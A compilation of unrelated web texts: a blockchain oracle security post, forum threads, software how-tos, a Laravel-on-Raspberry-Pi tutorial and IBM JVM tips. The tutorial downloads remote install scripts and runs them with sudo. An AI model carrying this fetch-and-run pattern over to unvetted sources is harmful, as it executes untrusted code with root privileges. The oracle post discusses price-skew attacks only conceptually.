There is a leap in complexity when we go from dealing with discrete data (often, and even more simplistically: binary decisions) to dealing with real-valued, continuous data that doesn’t natively live on the blockchain.
Let’s consider an example.
Detecting malicious behaviour in a price feed
Price feeds are currently the most widely-used example of off-chain data consumed on-chain. Consider the common architecture of a price feed served by n oracles with some aggregation contract.
What defines malicious behaviour in such a system? One could say: misreporting the price. But what does that look like? If the data doesn’t live natively on the blockchain, how do we know there was a misreport?
If we attempt to detect malicious behaviour at the time of aggregation, the only information we can use are the oracle responses themselves. That is, we can only compare the oracles responses to each other — since they are reporting off-chain data, we cannot compare their responses to any on-chain “gold standard”.
So this leaves us with “outlier detection”. However, critically: an outlier does not imply a misbehaving node.
To quote from a previous blog post:
Oracles have an incentive to gather cheap and easily accessible data because nothing is enforcing or incentivizing them to do otherwise (since, again, they are not enforced in any way to report their sources). This creates something of a Schelling point around cheap and easily available data. Further, this makes staking difficult, if not impossible, in such systems because now high-quality, curated data sources become outliers.
Also, here are distributions of some recent pre-aggregated results in a ETH-USD price feed. Which oracles are misbehaving or malicious? Which responses are worthy of a high “reputation score”? The answer is: we don’t have enough information to tell.
Further, since all outlier detection techniques are ultimately a function of the spread of the data; even with an outlier detection mechanism in place, a malicious oracle can still skew responses and remain undetected. One can imagine a potential attacker abusing the “fog of randomness” — the expectation of a certain amount of error, randomness, and variation with real-valued samples — in order to attack the system, i.e. skew the aggregate result. This is loosely related to a recent body of work called stealth attacks in cyber-physical systems.
Further, one should be careful before considering such “minor” misreports as insignificant. Consider the case where ETH price is close to triggering a large liquidation — a slight skew upwards/downwards in the reported price may trigger a liquidation that causes a disproportionate effect.
There is also the much worse case where we have an attacker (or group of colluding attackers) that control a majority of nodes, in which case they can control the aggregate result, resulting in honest nodes having their stakes slashed.
Not to suggest it’s impossible to detect any malicious behaviour at response time. It’s just that there is a lot of nuance and complexity here, and getting nodes to arrive at a “consensus” regarding real-valued, continuous data is fundamentally different than arriving at consensus about a binary value (or a small set of discrete values) like consensus algorithms up until this point in computer science history.
A time-based framework for detection
We can consider two possibilities for detecting malicious/poor behaviour in an oracle-serviced data feed: we can detect such behaviour (1) in the present or (2) in the future. Or, more finely-grained, we can choose to detect malicious behaviour at some point t ≥ 0, where t = 0 is the special case mentioned above. (Note: here we briefly ignore some of the nuance regarding “time” on the blockchain; it’s not yet relevant for the high-level discussion here.)
For the reasons mentioned above — in particular the point that outlier ≠ malicious — we believe that detecting malicious oracle behaviour at t=0 is ineffective, except in a few constrained scenarios.
In order to accommodate all of the rich data types that can be brought on-chain, punishing malicious behaviour requires a bespoke approach that can only be done after the incident occurred. That is, we take the t>0 approach to detection.
Conclusion and next blog post
When we go from decentralized consensus about a few discrete values to some sort of decentralized consensus on continuous, real values, we make a quantum leap in complexity and we aren’t really dealing with the same problem anymore. Such a discontinuous leap necessitates an entirely new approach.
Next week we will discuss Quantifiable Security and what it means for data feeds to be insured.
[See the next article in our series here.]
: Note that non-malicious behaviour can sometimes lead to these splits in the blockchain as well, due to general asynchrony in the network.
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There are 2 ways to assign class categories to classes.
- Add/Edit a class, and selected the relevant class categories.
- Use the "Reassign Categories" functionality in the Administrative pages.
Add/Edit a Class
When you add a new class, or edit an existing class, the list of Class Categories that can be assigned to the class will be displayed. Simply, select the relevant class categories, and click on save:
Studioware allows you to set or reassign categories to all classes in one convenient location. Follow these instructions to set the categories:
- Click on Administration
- Click on "Class Categories"
- Click on "Reassign Categories" on the side menu; The list of all your classes will be displayed.
- For any number of classes, click on the "Categories" drop down list. Select one or more categories from the list, or remove an number of categories:
- Click on the Save button once you are satisfied with all your category changes.
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In the Victorian London realm of story, Dr. Jekyll is joined by his friend Mary Lydgate, whose father, Dr. Lydgate, is a member of a prestigious science academy, as he hopes to convince him to back his project that he created, a serum that separates personalities, only to be rejected. The experiment would later attract the attention of Rumplestiltskin, who suddenly appears and helps Jekyll perfect the serum, and when Jekyll drinks it, he transforms into Hyde for the first time. That night at a party, Hyde, with the help of Rumplestiltskin, confronts Mary’s father and threatens to expose the truth about him sleeping with his lab assistant if he doesn’t grant Jekyll his membership into the academy. In the morning, Jekyll wakes up and remembers nothing but finds himself to be an academy member.
This site contains full information about Strange Case Of The Origami Yoda.
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Polish mathematician Wacław Sierpiński has three fractals named after him: the aforementioned triangle, the carpet and the curve. Making Sierpiński triangles is an end-of-year activity I love doing, as we get to go a bit off-curriculum and talk about fractals - one enthusiastic group once constructed a large triangle from their smaller ones that covered most of the wall in my old classroom, and making bunting from it also looks pretty funky.
Draw an equilateral triangle and mark the midpoints of each side. Connect these midpoints to create another equilateral triangle inside the first one. "Remove" (i.e. shade if you're colouring it) the smaller triangle you've just constructed. You're then left with three other equilateral triangles - and just repeat the process. It works best on triangular spotty paper as you can just follow the dots to draw the sides of the triangle.
The Sierpiński carpet is essentially made by doing the same thing with a square - but it gets interesting when you move to three dimensions and do the same thing with a cube, creating something called a Menger sponge. If you think of a 3x3x3 cube (like a Rubik's cube), this amounts to removing the small cube right in the middle, along with every center cube on each face. You then repeat the process with every whole cube that's left. Infinite repeats give a Menger sponge, which has the strange property of having zero volume but infinite surface area.
Obviously constructing (approximations of) Menger sponges can't really be done by removing bits from a cube. Check out this page from Dr. Jeannine Mosely, detailing how she and her team made a level 3 sponge from over 66 thousand business cards. There's also a great video here of the origami club at MIT constructing a sponge for the Mega Menger project run by Queen Mary's University London. If you can get your hands on old trading cards or pre-cut cardboard, partially constructing a level 2 sponge in the classroom is surprisingly feasible!
The Sierpinski curve is new to me today - I'm kind of seeing it as the flip of the Sierpinski triangle, as rather than removing bits each time, you add on bits instead. Click the link to see it, because although the construction process is simple, it's impossible to explain. I'm finding the fact that the enclosed area is a neat 5/12 of the original square really fascinating.
(Image credit: "Menger-Schwamm-Reihe" by Niabot - Own work. Licensed under CC BY 3.0 via Wikimedia Commons - https://commons.wikimedia.org/wiki/File:Menger-Schwamm-Reihe.jpg#/media/File:Menger-Schwamm-Reihe.jpg)
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Hi, is it possible to change the background-color of the text of a slide while I move the mouse to the second one?
What I try to do is to use “linear-gradient”, below is the code I try to use:
unfortunately I can’t change the color when I try to go back to the first slide, can anyone help me?
Welcome to the forum.
Do you have a more complete example of your code? A link or maybe an example you could put on codepen or similar?
I know it’s probably clear in your mind what you are trying to achieve, but a more fleshed out example would help others with assisting you.
Hello, this is my code:
The problem is from how the mouseenter event interacts with the Swiper component, and to solve the problem you need to attach a mousemove event to the Swiper container rather than individual slides and then determine the slide under the mouse to calculate the gradient effect.
Here’s how you can do it:
The code binds the mousemove event to the
.swiper-container, calculates the percentage of the mouse’s position relative to the container width, and determines which slide the mouse is currently hovering over. If the mouse is hovering over the active slide, it applies the gradient effect. If the mouse leaves the container, it resets the background of
Hi, thanks for your help, unfortunately it’s not what I need, my fault for explaining myself badly, I’ll try to be clearer: I would need a JS code that when dragging the slide from the white background it passes over the blue background you change the portion of text with another color, which is why I had hypothesized the use of linear-gradient, but I have difficulty calculating the percentage of text to change based on the position on the container.
code that when dragging the slide from the white background it passes over the blue background
I think we’ll need to see a working copy as I copied the code you posted and I don’t see the blue background so its hard to see what effect you are trying to achieve. A lot of the html doesn’t make sense in a responsive environment either so there seems to be something missing or you have copied some live html rather than source.
If you could get a working copy in codepen (like this half working code of yours that I have just pasted) then I’m sure one of the JS gurus here can point you in the right direction.
However it sounds to me as though you are trying to change the color of some ‘partial text’ as it travels over a coloured background and that would be difficult to achieve other than using mix-blend mode as in this recent demo of mine.
this is the problem, I have a div with a blue background and above a div with some text, this div must have two different colors as the slide moves:
background-clip: textproperty is not fully supported in all browsers. You may need to consider a fallback for browsers that do not support these properties. However the browser support for them, This code will change the background of the text to your linear gradient when you hover over a
.swiper-slideelement, and then change it back when you stop hovering.
The above coding is just an example, hope this could help.
this div must have two different colors as the slide moves:
With mix blend mode you can have the color change but unfortunately you cannot specify the colors so all you get is the difference.This turns the white text black but keeps the blue text on the right
Assuming that was the effect you were going for anyway I can’t see any other way to change it and I don’t see that adding a background when you move it is going to do anything as the text is already cut off on the static view.
Thanks to all for our support
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So you ran an upgrade, or got carried away tweaking things on your server, and now MySQL is acting like an island of its own. Your websites can’t connect, your phpmyadmin can’t connect, and you are miserable.
You get errors like
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/tmp/mysqld.sock'
and, you being a n00b like me, are at your wits end.
I may have a quick fix as long as the error is 2002 and it is complaining about a socket.
Go to your MySQL configuration file [which on Ubuntu is /etc/mysql/my.cnf ]
There, copy the socket mysqld is using. It will be something like
[mysqld] datadir=/usr/local/mysql/data socket=/var/lib/mysql/mysql.sock
Copy the line that says socket=/whatever/address/to/the/file.sock
See if there is a block for [client] that mentions socket. If there isn’t, make one below the block for [mysqld] and paste your socket line. If there is, fix the location to match.
Try now. No restart or anything needed. If it will work, it will work right away. If you have done good things in your life and deserve a break, this should put you out of your misery. 😀 It is among the likeliest culprits if new files and upgrades and such have happened.
If this doesn’t happen, then I would investigate to see if that location exists, has right permissions and such things…. or someone mentioned other checking for other configurations that may be messing with this – which I can’t even imagine where to begin.
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In my last article on User’s drive mapping, I had explained why we need drive mapping to the shared locations and how we can implement it using VBScript.
In this article I will explain what care we need to take when mapping any particular drive to the shared location. I will end the article with a scenario that I came across many times while doing drive mapping to the shared location.
When you are creating/designing the VBScript for the mapping logic make sure that you should not use
- the pre-defined user mapped drives like the drives for Floppy disk [like A drive], CD ROM [like E drive], Users data [like M drive], Roaming profile[like X drive], main drives [like C, D drives] etc. so before implementing the VBScript, make sure that which drives are available for mapping purpose.
Scenario: Suppose you have an application AppA, you have a requirement that this application should be able to access five different shared locations through the mapped drives.
Implementation: To implement it you have selected M, N, O, P and Q drives. Let’s say that M drive at user’s machine is already mapped for the user data.
You have designed you VBScript based on the above drives. Once you are done and when you had published that VBScript in XenApp, your user will complain that they are able to use/access all the shared locations except the one location that they mentioned in the requirement document.
Troubleshooting: Now as a XenApp administrator, you should get the information from your system administrator that what drives at user’s machine are mapped to some pre-defined locations. Like in above case M drive that XenApp Admin selected, is already mapped to the user’s data and so he should not have used/mapped it to any location. Now he has to modify the VBScript to point to the available drives. Once done, users will be “happy happy joy joy” and will be able to access all the required shared locations.
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Humphry - Painful Pleasures (Official Video)
We all go through life making some decisions we wish we never made, but to pull yourself out the mud without a lending hand, helps us appreciate the struggle. We all been through it and go through Painful Pleasures. - Humphry.
This is the visuals to the sound of motivation! Not only does the self-empowering message he spits put you first hand in the emotions of the struggle but to see the expressions Humphry show when the camera-eye is focused, we see it is deeper than the lyrical content of his music.. It’s Life.
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Navigation: Diary Templates
This section covers the following topics:
•How GridTemplates are used: what information Q++Studio extracts from GridTemplates, and how it uses it.
•Guidelines to use when designing GridTemplates.
See also: daily, weekly, monthly and yearly GridTemplates, importing GridTemplates as Templates.
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"Initialized" property is not nulable, so the dataset considers it as a required field. It's an error at dataset level, not aurelius manager level. You can just declared the property as Nullable<boolean>, or set the Required property of the TField to false.
I said in the post before, but just to make clear, it is not a database field, is a regular class property.
Actually, is a property from the base class of my entity. What I am understanding is that if Aurelius can map because recognize the data type, it map on the dataset EVEN it is not marked as a database field.
I see that properties that are PROTECTED does not get mapped. that is fine
However not all PUBLIC properties are correct. Not basic types (like lists, or my own types) are not listed on the dataset, that is eventually ok.
Interface type are listed. But as required, however does not cause any problem.
public properties with types AureliusDataset can handle are displayed. If they are not nullable, the TField is marked as required. For better control of what you want to display on the dataset, always define the persistent TField's, as you would do with any dataset.
Well, it should define the field as not required. But as I said, you can always define a persistent field and remove the required. Or set a default expression. If you want send me a compilable project that reproduces the problem, I can check it here why the nullable property still creates a required TField.
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Hi there, I'm very new to Sliverstripe.
I want to be able to attach or associate multiple files to a page type.
for example I have a page type 'Album' and I want to pick multiple mp3 tracks that have already been uploaded into the cms.
rather than having to create another page type 'track' and have one upload field per track, as that would be overkill and could be time consuming to create for Website Editors
anything spring to mind? Has-many File Manager looks like it would do what I need, but seem to be way-old and its not compatible with my version (I'm using v3.05)
thanks for any advice
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[cdi-dev] Contexts behavior in SE and Async Event for EDR1
rmannibucau at gmail.com
Thu Jun 18 09:13:23 EDT 2015
I wouldn't activate any "web" scope by default, in particular for async
events where I think most of the time it will not be used. Next feature
request will be to inherit the scope between async threads....and here I
guess we agree it will not go very far.
Side note: using request scope where actually a thread scope is needed is a
pain, maybe time to add a thread scoped with an accessible manual
activation. Would make "batches", "timers" etc easy to impl/integrate.
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2015-06-18 15:10 GMT+02:00 Antoine Sabot-Durand <antoine at sabot-durand.net>:
> Hi guys,
> We should finally decide how to manage normal scope context (other than
> application context ) in SE and during Async Event for EDR1.
> Having only RequestContext active during async event as Martin suggest in
> the PR makes sense and would be consistent with its behavior during async
> EJB call.
> Mark asked twice to activate Request Context all the time in SE (making it
> a new Application Context). I’m not found of it, but I’ml not the only one
> to decide here.
> What is you feeling about this ?
> cdi-dev mailing list
> cdi-dev at lists.jboss.org
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> code under the Apache License, Version 2 (
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What to Expect on set as an Extra/Background Actor for both large and small sets! Free Book Link: https://amzn.to/2Wy3FYk
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Wondering what GPUs people are using with Kandao Studio? The docs say Geforce 1080 minimum, but I've been getting good results with a 1070. Colleague with a 970m doesn't see the depth map option available, though. Wondering if the problem is 9xx series, or maybe VRAM?
Hey! Just wanted to let everyone know that I just released a new version of Stereo2Depth. I think the biggest new feature is that now you can save and load settings. This lets you make templates if you want, or more importantly, lets you cancel and resume renders.
Another feature a few people had asked me about is exporting stereo depth maps, so I included that as well.
Finally, I've added a horizontal offset slider. This lets you shift the equirectangular image around. Depth maps rarely wrap around seamlessly because of how they're calculated, so this lets you place that seam where you want it. Keep in mind that this will also change which direction is the "front".
Let me know if you have any questions or find any bugs! And if you use Stereo2Depth for any projects, please feel free to post about it in this subreddit!
Hello, I'm working on a project that's a narrative stereo 360 film, and we are using stereo depth maps to add in visual effects.
I've been trying Kandao Studio's depth map output, but the stitching and RGB output that comes with the depth map isn't up to scratch, so I'm toying with using Stereo2depth.
Does anyone know a way to modify Stereo2depth to output a depth map for each eye?
It would be immensely appreciated!
These are restitches of some of the Griffith Observatory test shots using Google Jump's High Quality Stitching option:
https://www.dropbox.com/s/ib7ar42jwhciq3m/GriffithRestitch_shot0002.mp4?dl=0 https://www.dropbox.com/s/ts0ky9ezcjg8d39/GriffithRestitch_shot0004.mp4?dl=0 https://www.dropbox.com/s/oltw9r2950gvtow/GriffithRestitch_shot0005.mp4?dl=0
All of these videos come from Hugo King-Fretts, shot on an Obsidian, with depth maps and stitching from Kandao Studio.
https://www.dropbox.com/s/93hd10ux1mx3uo1/HKF_Carpentry_backlight.mp4?dl=0 https://www.dropbox.com/s/39v4kkgtgeynrm3/HKF_Cottage_exterior.mp4?dl=0 https://www.dropbox.com/s/3b6z8pspdza5f7n/HKF_Falconer_near_tent.mp4?dl=0 https://www.dropbox.com/s/9rgefgt69lvhmug/HKF_Horse_close.mp4?dl=0 https://www.dropbox.com/s/2u90fekvmbx6il4/HKF_Horse_close_ramp.mp4?dl=0 https://www.dropbox.com/s/fuajmq9j6xzu1i4/HKF_Horse_gallop_hit_target.mp4?dl=0 https://www.dropbox.com/s/rkcva9b59sf48ew/HKF_Horse_waiting.mp4?dl=0 https://www.dropbox.com/s/havgkwylxclexgq/HKF_Horse_walk_past.mp4?dl=0 https://www.dropbox.com/s/344h5j97jhmshx8/HKF_House_interior.mp4?dl=0 https://www.dropbox.com/s/zo2wmolmpgfyrox/HKF_Jester_in_woodland.mp4?dl=0 https://www.dropbox.com/s/75crzumbbljags8/HKF_Large_house_exterior.mp4?dl=0 https://www.dropbox.com/s/f5eljweipzqfqtp/HKF_Old_cart_shed.mp4?dl=0 https://www.dropbox.com/s/0p2tdos9fbdxdbb/HKF_Walk_past_close_prox.mp4?dl=0
Hey guys! Just found this sub, been working on live-action 360 vids for a while! Happy to finally be around friends! On that note... has anyone found a workaround for nokia's OZO raw format? I know of the individual high bitrate MP4's, but it just seems really ridiculous to pay the $1500 a year per seat for their OZO software considering that they discontinued their cameras :-/
I just wanted everybody to know that there is a working Alpha build of Pseudoscience 6DoF Viewer for the Oculus Rift. It was rejected from publication for frame rate issues, but since I do not own a Rift, I am unable to debug it. So it may remain in Alpha for a while.
If you have a Rift and you'd like in on the Alpha, just PM me the email address associated with your Oculus account, and I'll add you to the list.
This subreddit is for sharing 6DoF photos and videos. Right now, these should be equirectangular 360 images in the Color-on-Top-Depth-on-Bottom format, suitable for playback in Pseudoscience 6DoF Viewer.
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Hi! I apologize if this has been covered, but I cannot seem to get my desired end result--
I have a table set up with counties on the left, and impact types on top as columns. 4 out of 5 columns are dollars, but I want one column to simply be units. Is this possible to do without creating another field?
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Super 8 feature Sleep Always is screening in Seattle on Friday July 29.
Venue: Rendezvous/Jewel Box Theater, 2322 2nd Avenue, Seattle, WA
For more info on the sreening and venue: http://www.18fps.net/
I don't know much beyond this. If you are in the Seattle area, check it out.
Sleep Always screening in Seattle July 29
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The definition of the Workday Number of a finite graph is given on page 14 in http://www.arml.com/2012_contest/2012_Contest_Final_Version.pdf and the rest of the problem statement is given at the top of page 12 (omitted here for brevity). Is the general problem of computing the Workday Number of an arbitrary graph based on a well-known area of graph theory, perhaps under another name? Are there references that would show how results about the Workday Number of an arbitrary finite graph fit into the current research literature in graph theory? i.e. if such results for arbitrary graphs are new or already known?
I coach an exceptionally talented ARML student who has some nice general results about Workday Numbers that go well beyond the contest questions and would like to advise him on how to best write up his results.
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Dear all, we need a website to be constructed in a very very similar way to [url removed, login to view]
The main features are:
Please, DON'T bid before reading the specifications bellow.
• User login account
• Payment gateway integration
• Admin backend to manage sellers and buyers interaction.
• CMS features on admin to control filter: ad new categories for the books; NEW universities; new programmes, new courses and semesters.
• Refund system for trouble transactions.
• Facebook connect login
• FAQ on lightbox.
• All static pages on lightbox. If using mobile, normal static page instead of lightbox.
• Notification newsletter when new semester starts. 2 different newsletters, for people who have sold books and for students, with the semester list of books.
• Website test version installed to dedicated server.
• After seller chooses the condition of the book from the dropdown menu, we suggest a price for the used book: This feature is NOT present on [url removed, login to view]
• Facebook share post after transaction, if user has connected through facebook (not present on [url removed, login to view])
More details are to follow but these are the main ones.
Looking forward to seeing your proposal.
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Modified Mi Home by Vevs’a
14 July 2023
This is the same app for the smart home of Xiaomi, only with better and accurate translation of actions, conditions and statuses.
Rating of 7 users
Download appModified Mi Home by Vevs’a
Full list of changes
- Added translation of actions/conditions, partly status and cards for multiple devices(thank you Alex Kvazis for the data collected!). Some edits of the translation and layout of the interface;
- To facilitate further transfer, all the data from the cloud is requested with the English localization; plug-ins also reported the need to use English (because some of them use default Chinese language in the absence of the requested locale). Unlike the version from the forum that I do not replace the English localization for Russian (which would have the effect of visually similar specified above), so both languages are still available.
- UDP: since he began to appear more and more transferred by the manufacturer of the plugins (although most without tears will not look), the need to use English localization (see the update from 14/01/18) are now reported only for those plugins where the default language in China. Ie, all normal plugins will try to use is selected in the system localization, and the list of "gifted" - will be forced to use English (it is not difficult to guess, the Russian in them anyway);
- Added ability to collect various data string (statuses/actions/notifications and tokens) in the file on the memory card for further transfer (details in article);
- Changed the storage location of the plugins for manual replacement without root. The solution differs from that presented at the forum that are not the root of the external drive, and the standard applications folder on the external drive, i.e., "/sdcard/Android/data/com.xiaomi.smarthome/files". This location allows you when the application is deleted by the system automatically and delete the plugin folder (which seems correct);
- Restored the ability of the scripts to disable themselves. I think that the manufacturer is confusing to deal with curves in a loop running conditions, and just cut off that possibility (albeit a little bit at the cost of flexibility). Use wisely and with caution;
- Removed useless in our latitudes, and motolese eyes the condition for changing the weather in China;
- Disabled most of the Chinese elements of the interface (store, recommended scenes, voice control, consumables, etc.), i.e. the application will look like the selected region is different from mainland China. Briefly checked, like basic functionality was not injured, but required "check battle". Waiting for the results in the comments, if anyone is at all needed;
- Disabled the voice control button and the news banner in the settings;
- Disabled onscreen-advertising and push notifications with it;
- disable the new login page by phone number, the default is the normal login Mi account;
- Added color separation of cloud and on-premises scenarios: lists the scenarios (in addition to lists child devices) the names of the cloud will appear dark blue;
- Added display device token in network properties and display the scenario ID (us_id) in its properties. The token for the device ID of the script and the user ID can be copied to the clipboard by long tap.
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Hi, I'm Ashley, a developer and hacker from England.
hi@ashleyw•co•uk ashleyw on Twitter, Reddit and Hacker News.
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- TeachesGerman language
Certified tutor with 5 years of experience in teaching German
About the tutor
I have been tutoring German for the last five years and I love to teach this subject to people all age, whether for school, for work or just for fun.
When I won one of the most famous literature prices in German I knew that my time was there to start teaching. In the meantime I won way more prices and I love to teach.
I have experience with native speakers as well as with people who just want to learn it for fun or for exams.I can assist with homework, assignments, presentations, dialogues, conversations.
Choose the time for your first lesson. The timings are displayed in your local timezone.
2018 — Present
JKU- Johannes Kepler Universität Linz
2019 — 2020
Simple or complex conversations are what I do every day.
I know some tricks to teach you in a simple but effective way.
Since I graduated in German, I know how to speak and write intensive German.
International certificates A1-B2
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I have taught a lot of people how to properly build sentences required in DaF.
Generel German is the best thing ever!
I have done some competitions in Business German.
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Is it possible to set up a server with uneven teams using bots? I need a way to set up a LAN game with 6 bots or so against a friend and me. (Or myself and 5 bots against one other bot) Every time I start a server it never does what I want.
I know in Q3 based games you can add bots from the console. Can this be done through the command console in UT2K4 somehow?
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I laughed when I saw this.
Being I consider Apple's most powerful system to be a glorified toy, you can imagine my opinion of trying development on an iPad. (Although I am a former Apple stockholder [only a few shares])
The thing doesn't even have a real keyboard... That just can't be conducive to development.
It appears to use a 1GHz Apple A4 as the CPU and have AT MOST a data capacity of 64GB. (source) I wouldn't even want to think about trying to use modern-day Photoshop on a system like that. I imagine the touch screen precision also isn't very adept to graphic design.
As far as I'm concerned, the iPad is a bloated eBook reader. I'd be looking at the Amazon Kindle for that. For development, I'd be looking at a Win 7 workstation. If you really need a small and mobile machine for intermediate development I'd consider high-end netbooks or low-end laptops rather than what is essentially an eBook reader.
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I'm a big fan of Laravel and Raspberry Pis, so I wanted to see if I could get Laravel working on one of my Pis. Installing PHP + Composer + Redis + a database is a chore, but Laravel offers a Docker-based solution called Sail that lets you run these in containers without having to install them on the base OS. The Laravel documentation's install script doesn't natively support ARM processors like those found on the Raspberry Pi, but it's still possible to use it to get Sail running with a few extra steps.
Things are changing quickly with Docker's support on ARM systems, so I have links to the official documentation for most of the steps. You may want to check the docs for changes as you get everything set up.
sudo apt-get remove docker docker-engine docker.io containerd runc
At the time of writing this post, you can't just install Docker with
apt install on a Raspberry Pi. Instead, you must use their convenience script.
curl -fsSL https://get.docker.com -o get-docker.sh sudo sh get-docker.sh
This is optional, but it's probably a good idea to run Docker as your user instead of with sudo. You'll need to log out and log in again for this to actually take effect.
sudo usermod -aG docker <your-user>
Because nothing is straight forward on a Raspberry Pi, you need to install Docker Compose with Python's Pip package manager instead of installing a binary. The docs recommend that if you install with Pip that you should use virtualenv, but I installed it on the base machine to keep things simple.
sudo pip3 install docker-compose
Note: I used pip3 instead of pip when I installed. The docs say use pip, but I figure it should probably run in Python 3. I'm not 100% sure 🤷♂️
Check the docs for installing Docker Compose.
From what I understand, Docker broke some ARM images around December 2020 because of something to do with the libseccomp2 library. I was using the full Raspberry OS with desktop enabled when I installed Laravel, so I navigated to the Debian libseccomp2 download page in my browser, download the deb file, opened it and clicked install.
If you're using Raspberry OS Lite, you'll need to find a way to get this package through the command line. If you're using Ubuntu Desktop on Raspberry Pi, the images work without needing to install libseccomp2.
I anticipate that this problem will be solved by Raspberry Pi OS in the future, but it is necessary for now.
If you go to the install page in Laravel's docs, it recommends installing Laravel by piping a script from cURL into Bash. Unfortunately, the script relies on the
laravelsail/php80-composer Docker image, which isn't available for ARM processors.
Fortunately, this image seems to just be an image of Composer that has the official Laravel installer already installed. We'll download the installer script and replace the image with the official Composer image and modify the installation command.
Navigate to the directory where you want to install your project and download the script with the following command:
curl https://laravel.build/example-app --output install.sh
install.sh with your favorite text editor and look for the following line:
docker run --rm \ -v $(pwd):/opt \ -w /opt \ laravelsail/php80-composer:latest \ bash -c "laravel new example-app && cd example-app && php ./artisan sail:install --with=mysql,redis,meilisearch,mailhog,selenium"
- Replace the
composer:latest, which has support for ARM.
- Change the bash command to use the Composer's
create-projectcommand instead of the global Laravel installer.
pgsql, then remove
selenium. MySQL, MeiliSearch, Mailhog and Selenium do not currently have ARM images available.
Your command should now look like this:
docker run --rm \ -v $(pwd):/opt \ -w /opt \ composer:latest \ bash -c "composer create-project laravel/laravel example-app && cd example-app && php ./artisan sail:install --with=pgsql,redis"
Save the script and run it using the command below.
At this point you should have a folder called
example-app in your current directory. Run the following command in terminal:
cd example-app && ./vendor/bin/sail up
After about half an hour of installing dependencies, you should have a running container. In my case, my PostgreSQL and Redis containers were giving me errors and crashing. I restarted my computer then ran
./vendor/bin/sail up again in the project directory and everything worked: I had Laravel running on my computer.
On my machine, Sail got angry when I tried to connect to the PostgreSQL database when there was no password set in my
.env file. If you get errors when you try to use the database, set the value of
DB_PASSWORD in your
.env file to any value you like and it should just work.
Running Sail on a Raspberry Pi is currently a little involved, but with Raspberry Pi's continuing to gain popularity and Apple's M1 processors being ARM based, I imagine this will become much more streamlined in the not-so-distant future.
I've seen GitHub issues with developers offering to help build a Selenium image for ARM, and when I tweeted about this project originally, MeiliSearch reached out to me directly about potentially adding an ARM image to their roadmap. The Sail experience on Raspberry Pi will only continue to get better with time.
Has something changed since I published this post? Let me know in the comments below so I can update this to include the current process.
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TEN THINGS GOOD TO KNOW ABOUT JVM WORKING WITH IBM BPM!!
1. What does JVM have to do with BPM?
BPM products are written in Java and run on Java. The IBM Java SDK/JRE is shipped within the WebSphere Application Server which is embedded with the BPM products. IBM develops JVM for Windows, Linux, AIX and z/OS operating systems. The performance of JVM is a crucial factor determining the performance of the BPM products. Java Platform Standard Edition (Java SE) 6 is shipped with WebSphere Application Server V7.0. Click here for a Java SE 6 overview.
The IBM-enhanced or "hybrid" SDK/JRE is shipped with products for Sun Solaris and HP-UX platforms. The "hybrid" is essentially a Sun Solaris or HP-UX Java package, with added IBM technology covering Security, ORB and XML and do not contain an IBM-developed JVM, but instead use the basic Sun/HP JVM unchanged.
2. How do I know the JVM version?
When you contact IBM Support for JVM related problems, you may be asked for the JVM version. The easiest and most convenient way of knowing the JVM version is to look in the SystemOut.log. The current environment display section will report the Java version. This is an extract from SystemOut.log from a Windows installation.
Java version = 1.6.0, Java Compiler = j9jit24, Java VM name = IBM J9 VM
This may not be sufficient when you report problems and to get a detailed version information run the command below:
[WebSphere Application Server Install Root]/java/jre/bin/java -version
java version "1.6.0"
Java(TM) SE Runtime Environment (build pwi3260sr7ifix-20100220_01(SR7+IZ70326))
IBM J9 VM (build 2.4, JRE 1.6.0 IBM J9 2.4 Windows XP x86-32 jvmwi3260sr7-201002
19_54049 (JIT enabled, AOT enabled)
J9VM - 20100219_054049
JIT - r9_20091123_13891
GC - 20100216_AA)
JCL - 20091202_01
3. Where do I find garbage collection logs, and why?
Garbage collection history is recorded in garbage collection logs, also known as verbosegc logs. This is crucial for JVM problems and a must have for troubleshooting most of the JVM problems. For operating systems using IBM JDK, the verbosegc log is written to native_stderr.log. For Sun Solaris or HP-UX Java package, the verbosegc is written to native_stdout.log.
The administrative console provides an option to enable verbosegc. Refer to the technote here for detailed steps.
When running stand-alone Java commands you can enable verbosegc using -verbosegc parameter. You can redirect output to a file using -Xverbogegclog:<filename>. A usage scenario for this command is when you face JVM issues running wsadmin command. You can edit the wsadmin script to add the parameters to the Java command.
Enabling verbosegc with the basic options produces very negligible performance impact to the running server processes. On the contrary, it is a very valuable troubleshooting aid in case of unexpected JVM problems.
4. Where do I see and set JVM properties?
At times, you might be required to modify JVM properties or add custom properties. The administrative console provides you options to specify these properties. The path is Servers -> Application Servers -> server_name -> Server Infrastructure -> Java and Process Management -> Process Definition -> Additional Properties -> Java Virtual Machine
Going for a 64-bit JVM has performance gains and loss. Read the WebSphere Application Server V7.0 64-bit performance paper here. There is also a slightly older (Java SE 5) WSTE Webcast on this topic here. There is also a porting guide for Java 64-bit here. Thanks to Michele Calcavecchia from the Support team for helping me find these.
6. What is an OutOfMemory error?
OutOfMemory error is a JVM error condition. It is caused either by Java heap running out of space to allocate any further objects, even after garbage collection, or by native memory running out of space in the JVM. Java heap outage can cause severe performance degradation of application performance or even outage. Native memory exhaustion can also be so severe that no native calls will be carried out, such as a call to create a new thread. OutOfMemory errors are usually caused by insufficient heap requirements or by a memory leak in software code.
7. What is a JVM crash?
Crash is a JVM error condition resulting in abrupt halt/termination of the JVM. Crashes can occur because of a JRE fault, because of a fault in native (JNI) code being run in the Java process, due to a resource outage such as memory, or a defect in JVM. A JVM crash usually creates a core dump on UNIX or userdump in Windows operating systems and a javacore file and SNAP trace on IBM JDKs.
For Sun Solaris and HP-UX operating systems an hs_err_pid*.log is created.
These files help in identifying the cause of the crash. It would be difficult reproducing crashes therefore note that you should not delete these crucial files from the original incident.
8. Heapdumps and javacores, What are these?
Heapdump is a dump of all the live objects that are on the Java heap. This is a compressed binary file of portable heap dump (phd) format. Heapdumps are enabled by default on an OutofMemory error by all JDKs. By default this gets generated in the <profile root> directory of the server JVM which reported the OutOfMemory.
Javacore or javadump or threaddump is a text file giving information that includes the Java threads present, the classes loaded, and heap statistics. It is automatically generated in the event of a JVM crash or OutOfMemory error. You would want to generate a javacore to see the threads in the JVM and their status anytime, especially for hang and high CPU usage scenarios. They can be triggered by user signal (kill -3) on UNIX or using wsadmin commands:
wasdmin>set jvm [$AdminControl completeObjectName type=JVM,process=%1,*] > %FILENAME%
wsadmin>$AdminControl invoke $jvm dumpThreads >> %FILENAME%
By default this gets generated in the <profile root> directory of the server JVM, for IBM JDK. For Sun Solaris and HP-UX, the javacore is written to the native_stdout.log.
9. What IBM tools are available for JVM diagnostics?
IBM Thread and Monitor Dump Analyzer for Java (here)
and many more...
